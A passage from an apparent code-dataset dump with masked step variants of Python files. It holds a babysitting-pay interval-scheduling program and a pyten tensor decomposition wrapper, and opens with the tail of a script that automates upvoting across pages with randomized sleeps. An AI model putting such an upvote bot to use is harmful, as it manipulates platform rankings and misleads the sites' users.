destination)\nbot.sign_in()\n\nfor i in range(3,5):\n bot.upvoter() \n bot.goto_page(i)\n time.sleep(random.randrange(300,500)/100)\n\n\n\n",
"step-ids": [
4,
5,
7,
8,
10
]
}
|
[
4,
5,
7,
8,
10
] |
"""
file: babysit.py
language: python3
author: [email protected] Parvathi Nair
author: vpb8262 Vishal Bulchandani
"""
"""
To compute the maximum pay a brother and sister can earn considering jobs that they can work on
together or separately depending on the number of children to babysit
"""
from operator import *
class Job:
"""
Job class which stores the attributes of the jobs
"""
def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):
self.day=day
self.startTime=startTime
self.endTime=endTime
self.noOfChildren=noOfChildren
self.hourlyRate=hourlyRate
self.value=(endTime-startTime)/100*hourlyRate
def __str__(self):
return str(self.day)+ " " + str(self.startTime) + " "+ str(self.endTime) + " " +str(self.noOfChildren) + " " + str(self.hourlyRate)+ " " + str(self.value)
#total is global variable
total = 0
def takeInput():
"""
Takes input from the console and creates objects and stores in a list jobList
:return: jobList-list in which input is stored as objects
"""
n=int(input())
jobList=[]
#taking n inputs and creating objects
for i in range (n):
str = input().strip('\n').split(" ")
if int(str[1])>=600 and int(str[2])<=2300:
jobs=Job (int(str[0]),int(str[1]),int(str[2]),int(str[3]),int(str[4]))
jobList.append(jobs)
return jobList
def sortInputByEndTimeAndDay(jobList):
"""
Sorts the jobList based on day and then the endTime
:param jobList: list of jobs
:return: jobList in a sorted manner with respect to day and endTime
"""
jobList=sorted(jobList, key= attrgetter('day','endTime'))
return jobList
def divideJobs(jobList, maximum):
"""
Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.
:param jobList: sorted jobLists
:param maximum: the maximum amongst the days being considered
:return: segregatedJobs which is a list of lists
"""
segregatedJobs=[[0]]*(maximum)
temp=jobList[0].day
j = 0
for i in range(0,len(jobList)):
if jobList[i].day==temp:
segregatedJobs[j].append(jobList[i])
else:
temp = jobList[i].day
j += 1
segregatedJobs[j]=[0,jobList[i]]
return segregatedJobs
def computeRho(segregatedJob):
"""
To compute the Roh value in a list
:param segregatedJob: jobs done in a particular day
:return: rho: list in which computed rho is stored
"""
#inserting 0 at the 1st position
rho = [0]
count = 0
#calculating rho
for i in range(1,len(segregatedJob)):
j = i-1
while(j>0):
if segregatedJob[i].startTime >= segregatedJob[j].endTime:
count += 1
rho.append(j)
break
j=j-1
if count == 0:
rho.append(0)
count = 0
return rho
def algo(segregatedJob):
"""
Implementing the interval scheduling algorithm
:param segregatedJob: A sorted list of jobs of one particular day
:return: None
"""
global total
rho = computeRho(segregatedJob)
r = len(rho);
S = [[0 for x in range(r)] for y in range(r)]
k = 0
#implementaion of scheduling algorithm
while(k<len(S)):
for j in range(k, len(S)):
if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:
S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[j - 1][k - 1])
elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:
S[j][k] = S[j - 1][k]
elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:
S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S[j - 1][k - 1])
elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:
S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - 1][k])
else:
pass
S[k][j] = S[j][k]
k += 1
length = len(S)
#Adding the max pay for every individual field in the matrix
total += S[length-1][length-1]
def main():
"""
Main function.
return: None
"""
global total
jobList=takeInput()
jobListSorted=sortInputByEndTimeAndDay(jobList)
maximum=jobListSorted[len(jobListSorted)-1].day
segregatedJobs=divideJobs(jobListSorted, maximum)
for i in range (len(segregatedJobs)):
algo(segregatedJobs[i])
# print the total pay
print(int(total))
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "f57fa2787934dc2a002f82aa1af1f1d9a7f90da5",
"index": 9947,
"step-1": "<mask token>\n\n\nclass Job:\n \"\"\"\n Job class which stores the attributes of the jobs\n \"\"\"\n\n def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):\n self.day = day\n self.startTime = startTime\n self.endTime = endTime\n self.noOfChildren = noOfChildren\n self.hourlyRate = hourlyRate\n self.value = (endTime - startTime) / 100 * hourlyRate\n\n def __str__(self):\n return str(self.day) + ' ' + str(self.startTime) + ' ' + str(self.\n endTime) + ' ' + str(self.noOfChildren) + ' ' + str(self.hourlyRate\n ) + ' ' + str(self.value)\n\n\n<mask token>\n\n\ndef takeInput():\n \"\"\"\n Takes input from the console and creates objects and stores in a list jobList\n :return: jobList-list in which input is stored as objects\n \"\"\"\n n = int(input())\n jobList = []\n for i in range(n):\n str = input().strip('\\n').split(' ')\n if int(str[1]) >= 600 and int(str[2]) <= 2300:\n jobs = Job(int(str[0]), int(str[1]), int(str[2]), int(str[3]),\n int(str[4]))\n jobList.append(jobs)\n return jobList\n\n\ndef sortInputByEndTimeAndDay(jobList):\n \"\"\"\n Sorts the jobList based on day and then the endTime\n :param jobList: list of jobs\n :return: jobList in a sorted manner with respect to day and endTime\n \"\"\"\n jobList = sorted(jobList, key=attrgetter('day', 'endTime'))\n return jobList\n\n\ndef divideJobs(jobList, maximum):\n \"\"\"\n Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.\n :param jobList: sorted jobLists\n :param maximum: the maximum amongst the days being considered\n :return: segregatedJobs which is a list of lists\n \"\"\"\n segregatedJobs = [[0]] * maximum\n temp = jobList[0].day\n j = 0\n for i in range(0, len(jobList)):\n if jobList[i].day == temp:\n segregatedJobs[j].append(jobList[i])\n else:\n temp = jobList[i].day\n j += 1\n segregatedJobs[j] = [0, jobList[i]]\n return segregatedJobs\n\n\ndef computeRho(segregatedJob):\n \"\"\"\n To compute the Roh value in a list\n :param segregatedJob: jobs done in a particular day\n :return: rho: list in which computed rho is stored\n \"\"\"\n rho = [0]\n count = 0\n for i in range(1, len(segregatedJob)):\n j = i - 1\n while j > 0:\n if segregatedJob[i].startTime >= segregatedJob[j].endTime:\n count += 1\n rho.append(j)\n break\n j = j - 1\n if count == 0:\n rho.append(0)\n count = 0\n return rho\n\n\ndef algo(segregatedJob):\n \"\"\"\n Implementing the interval scheduling algorithm\n :param segregatedJob: A sorted list of jobs of one particular day\n :return: None\n \"\"\"\n global total\n rho = computeRho(segregatedJob)\n r = len(rho)\n S = [[(0) for x in range(r)] for y in range(r)]\n k = 0\n while k < len(S):\n for j in range(k, len(S)):\n if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[\n j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = S[j - 1][k]\n elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S\n [j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - \n 1][k])\n else:\n pass\n S[k][j] = S[j][k]\n k += 1\n length = len(S)\n total += S[length - 1][length - 1]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Job:\n \"\"\"\n Job class which stores the attributes of the jobs\n \"\"\"\n\n def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):\n self.day = day\n self.startTime = startTime\n self.endTime = endTime\n self.noOfChildren = noOfChildren\n self.hourlyRate = hourlyRate\n self.value = (endTime - startTime) / 100 * hourlyRate\n\n def __str__(self):\n return str(self.day) + ' ' + str(self.startTime) + ' ' + str(self.\n endTime) + ' ' + str(self.noOfChildren) + ' ' + str(self.hourlyRate\n ) + ' ' + str(self.value)\n\n\n<mask token>\n\n\ndef takeInput():\n \"\"\"\n Takes input from the console and creates objects and stores in a list jobList\n :return: jobList-list in which input is stored as objects\n \"\"\"\n n = int(input())\n jobList = []\n for i in range(n):\n str = input().strip('\\n').split(' ')\n if int(str[1]) >= 600 and int(str[2]) <= 2300:\n jobs = Job(int(str[0]), int(str[1]), int(str[2]), int(str[3]),\n int(str[4]))\n jobList.append(jobs)\n return jobList\n\n\ndef sortInputByEndTimeAndDay(jobList):\n \"\"\"\n Sorts the jobList based on day and then the endTime\n :param jobList: list of jobs\n :return: jobList in a sorted manner with respect to day and endTime\n \"\"\"\n jobList = sorted(jobList, key=attrgetter('day', 'endTime'))\n return jobList\n\n\ndef divideJobs(jobList, maximum):\n \"\"\"\n Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.\n :param jobList: sorted jobLists\n :param maximum: the maximum amongst the days being considered\n :return: segregatedJobs which is a list of lists\n \"\"\"\n segregatedJobs = [[0]] * maximum\n temp = jobList[0].day\n j = 0\n for i in range(0, len(jobList)):\n if jobList[i].day == temp:\n segregatedJobs[j].append(jobList[i])\n else:\n temp = jobList[i].day\n j += 1\n segregatedJobs[j] = [0, jobList[i]]\n return segregatedJobs\n\n\ndef computeRho(segregatedJob):\n \"\"\"\n To compute the Roh value in a list\n :param segregatedJob: jobs done in a particular day\n :return: rho: list in which computed rho is stored\n \"\"\"\n rho = [0]\n count = 0\n for i in range(1, len(segregatedJob)):\n j = i - 1\n while j > 0:\n if segregatedJob[i].startTime >= segregatedJob[j].endTime:\n count += 1\n rho.append(j)\n break\n j = j - 1\n if count == 0:\n rho.append(0)\n count = 0\n return rho\n\n\ndef algo(segregatedJob):\n \"\"\"\n Implementing the interval scheduling algorithm\n :param segregatedJob: A sorted list of jobs of one particular day\n :return: None\n \"\"\"\n global total\n rho = computeRho(segregatedJob)\n r = len(rho)\n S = [[(0) for x in range(r)] for y in range(r)]\n k = 0\n while k < len(S):\n for j in range(k, len(S)):\n if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[\n j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = S[j - 1][k]\n elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S\n [j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - \n 1][k])\n else:\n pass\n S[k][j] = S[j][k]\n k += 1\n length = len(S)\n total += S[length - 1][length - 1]\n\n\ndef main():\n \"\"\"\n Main function.\n return: None\n \"\"\"\n global total\n jobList = takeInput()\n jobListSorted = sortInputByEndTimeAndDay(jobList)\n maximum = jobListSorted[len(jobListSorted) - 1].day\n segregatedJobs = divideJobs(jobListSorted, maximum)\n for i in range(len(segregatedJobs)):\n algo(segregatedJobs[i])\n print(int(total))\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\n\n\nclass Job:\n \"\"\"\n Job class which stores the attributes of the jobs\n \"\"\"\n\n def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):\n self.day = day\n self.startTime = startTime\n self.endTime = endTime\n self.noOfChildren = noOfChildren\n self.hourlyRate = hourlyRate\n self.value = (endTime - startTime) / 100 * hourlyRate\n\n def __str__(self):\n return str(self.day) + ' ' + str(self.startTime) + ' ' + str(self.\n endTime) + ' ' + str(self.noOfChildren) + ' ' + str(self.hourlyRate\n ) + ' ' + str(self.value)\n\n\ntotal = 0\n\n\ndef takeInput():\n \"\"\"\n Takes input from the console and creates objects and stores in a list jobList\n :return: jobList-list in which input is stored as objects\n \"\"\"\n n = int(input())\n jobList = []\n for i in range(n):\n str = input().strip('\\n').split(' ')\n if int(str[1]) >= 600 and int(str[2]) <= 2300:\n jobs = Job(int(str[0]), int(str[1]), int(str[2]), int(str[3]),\n int(str[4]))\n jobList.append(jobs)\n return jobList\n\n\ndef sortInputByEndTimeAndDay(jobList):\n \"\"\"\n Sorts the jobList based on day and then the endTime\n :param jobList: list of jobs\n :return: jobList in a sorted manner with respect to day and endTime\n \"\"\"\n jobList = sorted(jobList, key=attrgetter('day', 'endTime'))\n return jobList\n\n\ndef divideJobs(jobList, maximum):\n \"\"\"\n Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.\n :param jobList: sorted jobLists\n :param maximum: the maximum amongst the days being considered\n :return: segregatedJobs which is a list of lists\n \"\"\"\n segregatedJobs = [[0]] * maximum\n temp = jobList[0].day\n j = 0\n for i in range(0, len(jobList)):\n if jobList[i].day == temp:\n segregatedJobs[j].append(jobList[i])\n else:\n temp = jobList[i].day\n j += 1\n segregatedJobs[j] = [0, jobList[i]]\n return segregatedJobs\n\n\ndef computeRho(segregatedJob):\n \"\"\"\n To compute the Roh value in a list\n :param segregatedJob: jobs done in a particular day\n :return: rho: list in which computed rho is stored\n \"\"\"\n rho = [0]\n count = 0\n for i in range(1, len(segregatedJob)):\n j = i - 1\n while j > 0:\n if segregatedJob[i].startTime >= segregatedJob[j].endTime:\n count += 1\n rho.append(j)\n break\n j = j - 1\n if count == 0:\n rho.append(0)\n count = 0\n return rho\n\n\ndef algo(segregatedJob):\n \"\"\"\n Implementing the interval scheduling algorithm\n :param segregatedJob: A sorted list of jobs of one particular day\n :return: None\n \"\"\"\n global total\n rho = computeRho(segregatedJob)\n r = len(rho)\n S = [[(0) for x in range(r)] for y in range(r)]\n k = 0\n while k < len(S):\n for j in range(k, len(S)):\n if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[\n j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = S[j - 1][k]\n elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S\n [j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - \n 1][k])\n else:\n pass\n S[k][j] = S[j][k]\n k += 1\n length = len(S)\n total += S[length - 1][length - 1]\n\n\ndef main():\n \"\"\"\n Main function.\n return: None\n \"\"\"\n global total\n jobList = takeInput()\n jobListSorted = sortInputByEndTimeAndDay(jobList)\n maximum = jobListSorted[len(jobListSorted) - 1].day\n segregatedJobs = divideJobs(jobListSorted, maximum)\n for i in range(len(segregatedJobs)):\n algo(segregatedJobs[i])\n print(int(total))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nfrom operator import *\n\n\nclass Job:\n \"\"\"\n Job class which stores the attributes of the jobs\n \"\"\"\n\n def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):\n self.day = day\n self.startTime = startTime\n self.endTime = endTime\n self.noOfChildren = noOfChildren\n self.hourlyRate = hourlyRate\n self.value = (endTime - startTime) / 100 * hourlyRate\n\n def __str__(self):\n return str(self.day) + ' ' + str(self.startTime) + ' ' + str(self.\n endTime) + ' ' + str(self.noOfChildren) + ' ' + str(self.hourlyRate\n ) + ' ' + str(self.value)\n\n\ntotal = 0\n\n\ndef takeInput():\n \"\"\"\n Takes input from the console and creates objects and stores in a list jobList\n :return: jobList-list in which input is stored as objects\n \"\"\"\n n = int(input())\n jobList = []\n for i in range(n):\n str = input().strip('\\n').split(' ')\n if int(str[1]) >= 600 and int(str[2]) <= 2300:\n jobs = Job(int(str[0]), int(str[1]), int(str[2]), int(str[3]),\n int(str[4]))\n jobList.append(jobs)\n return jobList\n\n\ndef sortInputByEndTimeAndDay(jobList):\n \"\"\"\n Sorts the jobList based on day and then the endTime\n :param jobList: list of jobs\n :return: jobList in a sorted manner with respect to day and endTime\n \"\"\"\n jobList = sorted(jobList, key=attrgetter('day', 'endTime'))\n return jobList\n\n\ndef divideJobs(jobList, maximum):\n \"\"\"\n Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.\n :param jobList: sorted jobLists\n :param maximum: the maximum amongst the days being considered\n :return: segregatedJobs which is a list of lists\n \"\"\"\n segregatedJobs = [[0]] * maximum\n temp = jobList[0].day\n j = 0\n for i in range(0, len(jobList)):\n if jobList[i].day == temp:\n segregatedJobs[j].append(jobList[i])\n else:\n temp = jobList[i].day\n j += 1\n segregatedJobs[j] = [0, jobList[i]]\n return segregatedJobs\n\n\ndef computeRho(segregatedJob):\n \"\"\"\n To compute the Roh value in a list\n :param segregatedJob: jobs done in a particular day\n :return: rho: list in which computed rho is stored\n \"\"\"\n rho = [0]\n count = 0\n for i in range(1, len(segregatedJob)):\n j = i - 1\n while j > 0:\n if segregatedJob[i].startTime >= segregatedJob[j].endTime:\n count += 1\n rho.append(j)\n break\n j = j - 1\n if count == 0:\n rho.append(0)\n count = 0\n return rho\n\n\ndef algo(segregatedJob):\n \"\"\"\n Implementing the interval scheduling algorithm\n :param segregatedJob: A sorted list of jobs of one particular day\n :return: None\n \"\"\"\n global total\n rho = computeRho(segregatedJob)\n r = len(rho)\n S = [[(0) for x in range(r)] for y in range(r)]\n k = 0\n while k < len(S):\n for j in range(k, len(S)):\n if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[\n j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = S[j - 1][k]\n elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S\n [j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - \n 1][k])\n else:\n pass\n S[k][j] = S[j][k]\n k += 1\n length = len(S)\n total += S[length - 1][length - 1]\n\n\ndef main():\n \"\"\"\n Main function.\n return: None\n \"\"\"\n global total\n jobList = takeInput()\n jobListSorted = sortInputByEndTimeAndDay(jobList)\n maximum = jobListSorted[len(jobListSorted) - 1].day\n segregatedJobs = divideJobs(jobListSorted, maximum)\n for i in range(len(segregatedJobs)):\n algo(segregatedJobs[i])\n print(int(total))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"\nfile: babysit.py\nlanguage: python3\nauthor: [email protected] Parvathi Nair\nauthor: vpb8262 Vishal Bulchandani\n\n\"\"\"\n\"\"\"\nTo compute the maximum pay a brother and sister can earn considering jobs that they can work on\ntogether or separately depending on the number of children to babysit\n\n\"\"\"\nfrom operator import *\n\nclass Job:\n \"\"\"\n Job class which stores the attributes of the jobs\n \"\"\"\n def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):\n self.day=day\n self.startTime=startTime\n self.endTime=endTime\n self.noOfChildren=noOfChildren\n self.hourlyRate=hourlyRate\n self.value=(endTime-startTime)/100*hourlyRate\n\n def __str__(self):\n return str(self.day)+ \" \" + str(self.startTime) + \" \"+ str(self.endTime) + \" \" +str(self.noOfChildren) + \" \" + str(self.hourlyRate)+ \" \" + str(self.value)\n\n#total is global variable\ntotal = 0\ndef takeInput():\n \"\"\"\n Takes input from the console and creates objects and stores in a list jobList\n :return: jobList-list in which input is stored as objects\n \"\"\"\n n=int(input())\n jobList=[]\n\n #taking n inputs and creating objects\n for i in range (n):\n str = input().strip('\\n').split(\" \")\n if int(str[1])>=600 and int(str[2])<=2300:\n jobs=Job (int(str[0]),int(str[1]),int(str[2]),int(str[3]),int(str[4]))\n jobList.append(jobs)\n return jobList\n\ndef sortInputByEndTimeAndDay(jobList):\n \"\"\"\n Sorts the jobList based on day and then the endTime\n :param jobList: list of jobs\n :return: jobList in a sorted manner with respect to day and endTime\n \"\"\"\n jobList=sorted(jobList, key= attrgetter('day','endTime'))\n return jobList\n\n\ndef divideJobs(jobList, maximum):\n \"\"\"\n Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.\n :param jobList: sorted jobLists\n :param maximum: the maximum amongst the days being considered\n :return: segregatedJobs which is a list of lists\n \"\"\"\n\n segregatedJobs=[[0]]*(maximum)\n\n temp=jobList[0].day\n j = 0\n for i in range(0,len(jobList)):\n if jobList[i].day==temp:\n segregatedJobs[j].append(jobList[i])\n\n else:\n temp = jobList[i].day\n j += 1\n segregatedJobs[j]=[0,jobList[i]]\n\n return segregatedJobs\n\ndef computeRho(segregatedJob):\n \"\"\"\n To compute the Roh value in a list\n :param segregatedJob: jobs done in a particular day\n :return: rho: list in which computed rho is stored\n \"\"\"\n\n #inserting 0 at the 1st position\n rho = [0]\n count = 0\n\n #calculating rho\n for i in range(1,len(segregatedJob)):\n j = i-1\n while(j>0):\n if segregatedJob[i].startTime >= segregatedJob[j].endTime:\n count += 1\n rho.append(j)\n break\n j=j-1\n if count == 0:\n rho.append(0)\n count = 0\n\n\n return rho\n\n\ndef algo(segregatedJob):\n \"\"\"\n Implementing the interval scheduling algorithm\n :param segregatedJob: A sorted list of jobs of one particular day\n :return: None\n \"\"\"\n global total\n rho = computeRho(segregatedJob)\n r = len(rho);\n\n S = [[0 for x in range(r)] for y in range(r)]\n k = 0\n #implementaion of scheduling algorithm\n while(k<len(S)):\n for j in range(k, len(S)):\n if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[j - 1][k - 1])\n\n elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = S[j - 1][k]\n\n elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S[j - 1][k - 1])\n\n elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - 1][k])\n else:\n pass\n S[k][j] = S[j][k]\n k += 1\n length = len(S)\n\n #Adding the max pay for every individual field in the matrix\n total += S[length-1][length-1]\n\ndef main():\n \"\"\"\n Main function.\n return: None\n \"\"\"\n global total\n jobList=takeInput()\n jobListSorted=sortInputByEndTimeAndDay(jobList)\n maximum=jobListSorted[len(jobListSorted)-1].day\n segregatedJobs=divideJobs(jobListSorted, maximum)\n for i in range (len(segregatedJobs)):\n algo(segregatedJobs[i])\n\n # print the total pay\n print(int(total))\n\nif __name__ == '__main__':\n main()",
"step-ids": [
9,
11,
12,
13,
14
]
}
|
[
9,
11,
12,
13,
14
] |
import pandas as pd
import numpy as np
import pyten.tenclass
import pyten.method
import pyten.tools
def scalable(file_name=None, function_name=None, recover=None, omega=None, r=2, tol=1e-8, maxiter=100, init='random',
printitn=0):
"""
Helios1 API returns CP_ALS, TUCKER_ALS, or NNCP decomposition or Recovery Result
arg can be list, tuple, set, and array with numerical values.
-----------
:param file_name: {Default: None}
:param function_name: Tensor-based Method
:param recover: Input '1' to recover other to decompose.{Default: None}
:param omega: Index Tensor of Obseved Entries
:param r: The rank of the Tensor you want to use for approximation (recover or decompose).{Default: 2}
:param tol: Tolerance on difference in fit.(Convergence tolerance for both cp(als) or tucker(als).){Default: 1.0e-4}
:param maxiter: Maximum number of iterations {Default: 50}
:param init: Initial guess 'random'|'nvecs'|'eigs'. {Default 'random'}
:param printitn: Print fit every n iterations; 0 for no printing.
-----------
:return Ori: Original Tensor
:return full: Full Tensor reconstructed by decomposed matrices
:return Final: Decomposition Results e.g. Ttensor or Ktensor
:return Rec: Recovered Tensor (Completed Tensor)
-----------
"""
# User Interface
if file_name is None:
file_name = raw_input("Please input the file_name of the data: \n")
print("\n")
if function_name is None:
function_name = raw_input("Please choose the method you want to use to recover data(Input one number):\n"
" 1. Distributed CP(ALS) 2.Distributed CP(ADMM) 3. DisTenC 0.Exit \n")
print("\n")
#if recover is None:
# recover = raw_input("If there are missing values in the file? (Input one number)\n"
# "1.Yes, recover it 2.No, just decompose (Missing entries in the original tensor will be replaced by 0) 0.Exit\n")
# Use pandas package to load data
## if file_name[-3:] == 'csv':
# dat1 = pd.read_csv(file_name, delimiter=';')
# Data preprocessing
# First: create Sptensor
# dat = dat1.values
# sha = dat.shape
# subs = dat[:, range(sha[1] - 1)]
# subs = subs - 1
# vals = dat[:, sha[1] - 1]
# vals = vals.reshape(len(vals), 1)
# siz = np.max(subs, 0)
# siz = np.int32(siz + 1)
# X1 = pyten.tenclass.Sptensor(subs, vals, siz)
# Second: create Tensor object and find missing data
# X = X1.totensor()
# Ori = X.data
# lstnan = np.isnan(X.data)
# X.data = np.nan_to_num(X.data)
# Construct omega
#output = 1 # An output indicate flag. (Decompose: 1, Recover:2)
Ori = None
#if type(omega) != np.ndarray:
# # if True in lstnan:
# omega = X.data * 0 + 1
# omega[lstnan] = 0
# if recover == '1':
# output = 2
# Choose method to recover or decompose
if type(function_name) == str:
if function_name == '1' or function_name == 'D_cp_als':
Dals = pyten.method.TensorDecompositionALS()
Dals.dir_data = file_name
Dals.rank = r
Dals.run()
Dals.maxIter = maxiter
Dals.tol = tol
######
Final = Dals.ktensor
Rec = None
full = Final.totensor()
######
elif function_name == '2' or function_name == 'D_ADMM':
Dadmm = pyten.method.DistTensorADMM()
Dadmm.dir_data = file_name
Dadmm.rank = r
Dadmm.run()
Dadmm.maxIter = maxiter
Dadmm.tol = tol
######
Final = Dadmm.ktensor
Rec = None
full = Final.totensor()
######
elif function_name == '3' or function_name == 'D_ADMM_C':
DadmmC = pyten.method.DistTensorCompletionADMM()
DadmmC.dir_data = file_name
DadmmC.rank = r
DadmmC.run()
DadmmC.maxIter = maxiter
DadmmC.tol = tol
######
Final = DadmmC.ktensor
#Rec = Final.totensor().data * omega + X.data * (1 - omega)
full = Final.totensor()
Rec = full
######
elif function_name == '0':
print 'Successfully Exit'
return None, None, None, None
else:
raise ValueError('No Such Method')
else:
raise TypeError('No Such Method')
# Output Result
# [nv, nd] = subs.shape
if function_name == 1 or function_name == 2:
newsubs = full.tosptensor().subs
tempvals = full.tosptensor().vals
newfilename = file_name[:-4] + '_Decomposite' + file_name[-4:]
#print "\n" + "The original Tensor is: "
#print X1
print "\n" + "The Decomposed Result is: "
print Final
else:
newsubs = Rec.tosptensor().subs
tempvals = Rec.tosptensor().vals
newfilename = file_name[:-4] + '_Recover' + file_name[-4:]
#print "\n" + "The original Tensor is: "
#print Ori
print "\n" + "The Recovered Tensor is: "
print Rec.data
# Return result
return Ori, full, Final, Rec
|
normal
|
{
"blob_id": "39fdb9c586c3cf92d493269ceac419e0058a763a",
"index": 380,
"step-1": "import pandas as pd\nimport numpy as np\n\nimport pyten.tenclass\nimport pyten.method\nimport pyten.tools\n\n\ndef scalable(file_name=None, function_name=None, recover=None, omega=None, r=2, tol=1e-8, maxiter=100, init='random',\n printitn=0):\n \"\"\"\n Helios1 API returns CP_ALS, TUCKER_ALS, or NNCP decomposition or Recovery Result\n arg can be list, tuple, set, and array with numerical values.\n -----------\n :param file_name: {Default: None}\n :param function_name: Tensor-based Method\n :param recover: Input '1' to recover other to decompose.{Default: None}\n :param omega: Index Tensor of Obseved Entries\n :param r: The rank of the Tensor you want to use for approximation (recover or decompose).{Default: 2}\n :param tol: Tolerance on difference in fit.(Convergence tolerance for both cp(als) or tucker(als).){Default: 1.0e-4}\n :param maxiter: Maximum number of iterations {Default: 50}\n :param init: Initial guess 'random'|'nvecs'|'eigs'. {Default 'random'}\n :param printitn: Print fit every n iterations; 0 for no printing.\n -----------\n :return Ori: Original Tensor\n :return full: Full Tensor reconstructed by decomposed matrices\n :return Final: Decomposition Results e.g. Ttensor or Ktensor\n :return Rec: Recovered Tensor (Completed Tensor)\n -----------\n \"\"\"\n\n # User Interface\n if file_name is None:\n file_name = raw_input(\"Please input the file_name of the data: \\n\")\n print(\"\\n\")\n\n if function_name is None:\n function_name = raw_input(\"Please choose the method you want to use to recover data(Input one number):\\n\"\n \" 1. Distributed CP(ALS) 2.Distributed CP(ADMM) 3. DisTenC 0.Exit \\n\")\n print(\"\\n\")\n #if recover is None:\n # recover = raw_input(\"If there are missing values in the file? (Input one number)\\n\"\n # \"1.Yes, recover it 2.No, just decompose (Missing entries in the original tensor will be replaced by 0) 0.Exit\\n\")\n\n # Use pandas package to load data\n## if file_name[-3:] == 'csv':\n# dat1 = pd.read_csv(file_name, delimiter=';')\n\n # Data preprocessing\n # First: create Sptensor\n# dat = dat1.values\n# sha = dat.shape\n# subs = dat[:, range(sha[1] - 1)]\n# subs = subs - 1\n# vals = dat[:, sha[1] - 1]\n# vals = vals.reshape(len(vals), 1)\n# siz = np.max(subs, 0)\n# siz = np.int32(siz + 1)\n# X1 = pyten.tenclass.Sptensor(subs, vals, siz)\n\n # Second: create Tensor object and find missing data\n# X = X1.totensor()\n# Ori = X.data\n# lstnan = np.isnan(X.data)\n# X.data = np.nan_to_num(X.data)\n\n # Construct omega\n #output = 1 # An output indicate flag. (Decompose: 1, Recover:2)\n Ori = None\n #if type(omega) != np.ndarray:\n # # if True in lstnan:\n # omega = X.data * 0 + 1\n # omega[lstnan] = 0\n # if recover == '1':\n # output = 2\n\n # Choose method to recover or decompose\n if type(function_name) == str:\n if function_name == '1' or function_name == 'D_cp_als':\n Dals = pyten.method.TensorDecompositionALS()\n Dals.dir_data = file_name\n Dals.rank = r\n Dals.run()\n Dals.maxIter = maxiter\n Dals.tol = tol\n\n ######\n Final = Dals.ktensor\n Rec = None\n full = Final.totensor()\n ######\n\n elif function_name == '2' or function_name == 'D_ADMM':\n Dadmm = pyten.method.DistTensorADMM()\n Dadmm.dir_data = file_name\n Dadmm.rank = r\n Dadmm.run()\n Dadmm.maxIter = maxiter\n Dadmm.tol = tol\n\n ######\n Final = Dadmm.ktensor\n Rec = None\n full = Final.totensor()\n ######\n\n elif function_name == '3' or function_name == 'D_ADMM_C':\n DadmmC = pyten.method.DistTensorCompletionADMM()\n DadmmC.dir_data = file_name\n DadmmC.rank = r\n DadmmC.run()\n DadmmC.maxIter = maxiter\n 